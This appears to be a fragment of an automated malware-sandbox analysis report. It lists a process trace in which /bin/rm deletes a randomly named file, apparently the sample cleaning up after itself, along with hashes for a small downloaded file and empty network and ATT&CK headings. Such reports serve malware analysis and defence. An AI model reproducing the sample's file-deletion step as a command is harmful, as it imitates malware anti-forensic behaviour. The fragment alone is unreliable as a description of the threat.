/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:1004
-
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97